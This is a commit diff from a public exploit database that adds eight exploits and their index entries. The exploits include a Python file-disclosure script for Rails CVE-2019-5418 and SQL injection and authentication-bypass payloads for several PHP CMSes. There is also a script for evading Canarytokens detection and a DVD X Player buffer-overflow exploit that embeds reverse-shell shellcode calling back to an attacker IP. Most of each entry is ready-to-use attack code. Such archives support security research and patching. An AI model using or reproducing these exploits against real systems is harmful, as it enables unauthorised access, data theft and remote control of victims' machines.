DB: 2019-03-22
8 changes to exploits/shellcodes Canarytokens 2019-03-01 - Detection Bypass DVD X Player 5.5.3 - '.plf' Buffer Overflow Netartmedia Vlog System - 'email' SQL Injection Rails 5.2.1 - Arbitrary File Content Disclosure The Company Business Website CMS - Multiple Vulnerabilities uHotelBooking System - 'system_page' SQL Injection Placeto CMS Alpha v4 - 'page' SQL Injection Bootstrapy CMS - Multiple SQL Injection
This commit is contained in:
Offensive Security
parent
7bd54d5a91
commit
34e4bc14d9
9 changed files with 315 additions and 0 deletions
73
exploits/multiple/webapps/46585.py
Executable file
73
exploits/multiple/webapps/46585.py
Executable file
|
|
@ -0,0 +1,73 @@
|
|||
'''
|
||||
Exploit Title: File Content Disclosure on Rails
|
||||
Date: CVE disclosed 3/16 today's date is 3/20
|
||||
Exploit Author: NotoriousRebel
|
||||
Vendor Homepage: https://rubyonrails.org/
|
||||
Software Link: https://github.com/rails/rails
|
||||
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
|
||||
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
|
||||
CVE: 2019-5418
|
||||
'''
|
||||
import sys
|
||||
|
||||
try:
|
||||
import requests
|
||||
except ImportError:
|
||||
print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def banner():
|
||||
banner = """
|
||||
----------------------------------------------
|
||||
Arbitrary Traversal exploit for Ruby on Rails
|
||||
CVE-2019-5418
|
||||
----------------------------------------------
|
||||
"""
|
||||
print(banner)
|
||||
|
||||
def check_args():
|
||||
if len(sys.argv) != 2:
|
||||
print("Invalid number of arguments entered!")
|
||||
how_to_use = "python3 Bandit.py url"
|
||||
print('Use as:', how_to_use)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def check_url(url):
|
||||
status_code = requests.get(url)
|
||||
if status_code != 200:
|
||||
print("Url is invalid or can not be reached!")
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def read_file(url, file):
|
||||
headers = {'Accept': file + '{{'}
|
||||
req = requests.get(url, headers=headers)
|
||||
return req
|
||||
|
||||
|
||||
def main():
|
||||
banner()
|
||||
check_args()
|
||||
url = sys.argv[1]
|
||||
while True:
|
||||
try:
|
||||
file = input("Enter file to read (enter quit to exit): ")
|
||||
except Exception:
|
||||
file = raw_input("Enter file to read (enter quit to exit): ")
|
||||
try:
|
||||
if file.lower() == 'quit':
|
||||
break
|
||||
except Exception:
|
||||
if file == 'quit':
|
||||
break
|
||||
response = read_file(url, file)
|
||||
print(response.text)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
main()
|
||||
except KeyboardInterrupt:
|
||||
print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')
|
||||
13
exploits/php/webapps/46583.txt
Normal file
13
exploits/php/webapps/46583.txt
Normal file
|
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
|
||||
# Date: 20.03.2019
|
||||
# Exploit Author: Ahmet Ümit BAYRAM
|
||||
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
|
||||
# Demo Site: https://www.phpscriptdemos.com/vlogs/
|
||||
# Version: Lastest
|
||||
# Tested on: Kali Linux
|
||||
# CVE: N/A
|
||||
----- PoC: SQLi -----
|
||||
# Request: http://localhost/[PATH]/index.php
|
||||
# Vulnerable Parameter: email (POST)
|
||||
# Attack
|
||||
Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password
|
||||
31
exploits/php/webapps/46586.txt
Normal file
31
exploits/php/webapps/46586.txt
Normal file
|
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: The Company Business Website CMS - 'user_name' SQL
|
||||
Injection
|
||||
# Date: 20.03.2019
|
||||
# Exploit Author: Ahmet Ümit BAYRAM
|
||||
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
|
||||
# Demo Site: http://thecompany.morkocbilisim.com
|
||||
# Version: Lastest
|
||||
# Tested on: Kali Linux
|
||||
# CVE: N/A
|
||||
|
||||
----- PoC: SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/admin/production/login.php
|
||||
Vulnerable Parameter: user_name (POST)
|
||||
Payload: user_name=VNfn' UNION ALL SELECT
|
||||
NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--
|
||||
WMfV&user_password=&loggin=Psop
|
||||
|
||||
|
||||
# Exploit Title: The Company Business Website CMS - Authentication Bypass
|
||||
# Date: 20.03.2019
|
||||
# Exploit Author: Ahmet Ümit BAYRAM
|
||||
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
|
||||
# Demo Site: http://thecompany.morkocbilisim.com
|
||||
# Version: Lastest
|
||||
# Tested on: Kali Linux
|
||||
# CVE: N/A
|
||||
----- PoC: Authentication Bypass -----
|
||||
Administration Panel: http://localhost/[PATH]/admin/production/login.php
|
||||
Username: '=' 'or'
|
||||
Password: '=' 'or'
|
||||
17
exploits/php/webapps/46587.txt
Normal file
17
exploits/php/webapps/46587.txt
Normal file
|
|
@ -0,0 +1,17 @@
|
|||
# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
|
||||
# Date: 21.03.2019
|
||||
# Exploit Author: Ahmet Ümit BAYRAM
|
||||
# Vendor Homepage: https://www.hotel-booking-script.com
|
||||
# Demo Site: https://www.hotel-booking-script.com/demo/
|
||||
# Version: Lastest
|
||||
# Tested on: Kali Linux
|
||||
# CVE: N/A
|
||||
# Description: uHotelBooking is a powerful hotel management and online
|
||||
booking/reservation site script.
|
||||
|
||||
----- PoC: SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/index.php
|
||||
Vulnerable Parameter: system_page (GET)
|
||||
Attack Pattern:
|
||||
http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
|
||||
36
exploits/php/webapps/46588.txt
Normal file
36
exploits/php/webapps/46588.txt
Normal file
|
|
@ -0,0 +1,36 @@
|
|||
Placeto CMS Alpha v4 - 'page' SQL Injection
|
||||
|
||||
# Title: Placeto CMS
|
||||
# Date: 21.03.2019
|
||||
# Exploit Author: Abdullah Çelebi
|
||||
# Vendor Homepage: https://sourceforge.net/projects/placeto/
|
||||
# Software Link: https://sourceforge.net/projects/placeto/files/alpha-rv.4/placeto.zip
|
||||
# Version: Alpha rv.4
|
||||
# Category: Webapps
|
||||
# Tested on: WAMPP @Win
|
||||
# Software description:
|
||||
A lightweight, easy to use PHP content management system (CMS). Written to
|
||||
be fast and to use as little memory as possible. Placeto CMS offers browser
|
||||
and server caching, provides gzip compression and to cut down on bandwidth
|
||||
and CPU time.
|
||||
|
||||
# Vulnerabilities:
|
||||
# An attacker can access all data following an authorized user login using
|
||||
the parameter.
|
||||
|
||||
|
||||
# POC - SQLi :
|
||||
|
||||
# Parameter: page (GET)
|
||||
# Request URL: http://localhost/placeto/admin/edit.php?page=key
|
||||
|
||||
# Type : boolean-based blind
|
||||
page=JyI" AND 1647=1647 AND "svwN"="svwN
|
||||
|
||||
# Type : time-based blind
|
||||
page=JyI" AND SLEEP(5) AND "uIvY"="uIvY
|
||||
|
||||
# Type : union query
|
||||
page=-8388" UNION ALL SELECT
|
||||
NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||
CbSf
|
||||
36
exploits/php/webapps/46590.txt
Normal file
36
exploits/php/webapps/46590.txt
Normal file
|
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
|
||||
# Date: 21.03.2019
|
||||
# Exploit Author: Ahmet Ümit BAYRAM
|
||||
# Vendor Homepage: http://bootstrapy.com
|
||||
# Demo Site: http://bootstrapy.net/demo/
|
||||
# Version: Lastest
|
||||
# Tested on: Kali Linux
|
||||
# CVE: N/A
|
||||
|
||||
----- PoC 1: SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/modules/forums/forum-thread.php
|
||||
Vulnerable Parameter: thread_id (POST)
|
||||
Attack Patten:
|
||||
search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
|
||||
|
||||
----- PoC 2: SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/modules/pages/contact-submit.php
|
||||
Vulnerable Parameter: subject (POST)
|
||||
Attack Pattern:
|
||||
email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
|
||||
|
||||
----- PoC 3 - SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
|
||||
Vulnerable Parameter: post-id
|
||||
Attack Pattern:
|
||||
body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z"e=1&submit=&thread-id=1
|
||||
|
||||
----- PoC 4 - SQLi -----
|
||||
|
||||
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
|
||||
Vulnerable Parameter: thread-id (POST)
|
||||
Attack Pattern:
|
||||
quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
|
||||
37
exploits/windows/dos/46589.php
Normal file
37
exploits/windows/dos/46589.php
Normal file
|
|
@ -0,0 +1,37 @@
|
|||
## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
|
||||
# Date: 20.03.2019
|
||||
# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale
|
||||
# Vendor Homepage: https://thinkst.com/
|
||||
# Version: up to 2019-03-01
|
||||
# Software Link: https://github.com/thinkst/canarytokens
|
||||
# Google Dork: N/A
|
||||
# CVE: 2019-9768
|
||||
#==================================================================================================================================================================================
|
||||
# PoC:
|
||||
#
|
||||
#
|
||||
#
|
||||
# Requires unzip:
|
||||
#
|
||||
# sudo apt-get install unzip
|
||||
#
|
||||
#
|
||||
|
||||
|
||||
<?php
|
||||
|
||||
system('unzip ' . $argv[1] . '.docx');
|
||||
|
||||
system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');
|
||||
|
||||
$strFile = file_get_contents("docProps/core.xml");
|
||||
|
||||
if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )
|
||||
{
|
||||
echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "Should be safe to open normally";
|
||||
}
|
||||
?>
|
||||
64
exploits/windows/local/46584.py
Executable file
64
exploits/windows/local/46584.py
Executable file
|
|
@ -0,0 +1,64 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
|
||||
# Date: 20.03.2019
|
||||
# Exploit Author: Paolo Perego - paolo@armoredcode.com
|
||||
# Vendor Homepage: http://www.dvd-x-player.com
|
||||
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
|
||||
# Version: 5.5.3.8 and above
|
||||
# Tested on: Windows 7 Professional SP1 x86
|
||||
# CVE : CVE-2018-9128
|
||||
# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438
|
||||
# In Windows 7, SEH handler to be used contains a \x00 byte that it has been
|
||||
# obtained using a restricted char. For such a reason, every jump has to be
|
||||
# backward on the beginning of attacking shellcode.
|
||||
|
||||
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode
|
||||
|
||||
shellcode = ""
|
||||
shellcode += "\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
|
||||
shellcode += "\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a"
|
||||
shellcode += "\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93"
|
||||
shellcode += "\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c"
|
||||
shellcode += "\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed"
|
||||
shellcode += "\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c"
|
||||
shellcode += "\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18"
|
||||
shellcode += "\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28"
|
||||
shellcode += "\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68"
|
||||
shellcode += "\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c"
|
||||
shellcode += "\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1"
|
||||
shellcode += "\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08"
|
||||
shellcode += "\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5"
|
||||
shellcode += "\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed"
|
||||
shellcode += "\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf"
|
||||
shellcode += "\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0"
|
||||
shellcode += "\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10"
|
||||
shellcode += "\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c"
|
||||
shellcode += "\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50"
|
||||
shellcode += "\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2"
|
||||
shellcode += "\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75"
|
||||
shellcode += "\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6"
|
||||
shellcode += "\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0"
|
||||
shellcode += "\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d"
|
||||
shellcode += "\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1"
|
||||
shellcode += "\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58"
|
||||
shellcode += "\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30"
|
||||
shellcode += "\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94"
|
||||
shellcode += "\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30"
|
||||
shellcode += "\x6b\xc2\x36"
|
||||
|
||||
junk = "\x90" * (600 -len(shellcode))
|
||||
junk += shellcode
|
||||
|
||||
# nasm > jmp $-400
|
||||
# 00000000 E96BFEFFFF jmp 0xfffffe70
|
||||
backflip="\x90\x90\x90\xE9\x6B\xFE\xFF\xFF"
|
||||
junk += backflip
|
||||
|
||||
# 00401838 |. 5E POP ESI
|
||||
junk += "\xeb\xf6\x90\x90"
|
||||
junk += "\x38\x18\x40\x1a"
|
||||
|
||||
file = open("evil_playlist.plf", "w")
|
||||
file.write(junk)
|
||||
file.close()
|
||||
|
|
@ -6366,6 +6366,7 @@ id,file,description,date,author,type,platform,port
|
|||
46569,exploits/windows/dos/46569.txt,"Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject",2019-03-19,"Google Security Research",dos,windows,
|
||||
46570,exploits/multiple/dos/46570.txt,"Google Chrome < M73 - MidiManagerWin Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
|
||||
46571,exploits/multiple/dos/46571.txt,"Google Chrome < M73 - FileSystemOperationRunner Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
|
||||
46589,exploits/windows/dos/46589.php,"Canarytokens 2019-03-01 - Detection Bypass",2019-03-21,"Gionathan Reale",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
|
@ -10372,6 +10373,7 @@ id,file,description,date,author,type,platform,port
|
|||
46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
|
||||
46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
|
||||
46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows,
|
||||
46584,exploits/windows/local/46584.py,"DVD X Player 5.5.3 - '.plf' Buffer Overflow",2019-03-21,"Paolo Perego",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
@ -41025,3 +41027,9 @@ id,file,description,date,author,type,platform,port
|
|||
46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80
|
||||
46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80
|
||||
46582,exploits/php/webapps/46582.txt,"Netartmedia Deals Portal - 'Email' SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
|
||||
46583,exploits/php/webapps/46583.txt,"Netartmedia Vlog System - 'email' SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
|
||||
46585,exploits/multiple/webapps/46585.py,"Rails 5.2.1 - Arbitrary File Content Disclosure",2019-03-21,NotoriousRebel,webapps,multiple,
|
||||
46586,exploits/php/webapps/46586.txt,"The Company Business Website CMS - Multiple Vulnerabilities",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
|
||||
46587,exploits/php/webapps/46587.txt,"uHotelBooking System - 'system_page' SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
|
||||
46588,exploits/php/webapps/46588.txt,"Placeto CMS Alpha v4 - 'page' SQL Injection",2019-03-21,"Abdullah Çelebi",webapps,php,80
|
||||
46590,exploits/php/webapps/46590.txt,"Bootstrapy CMS - Multiple SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue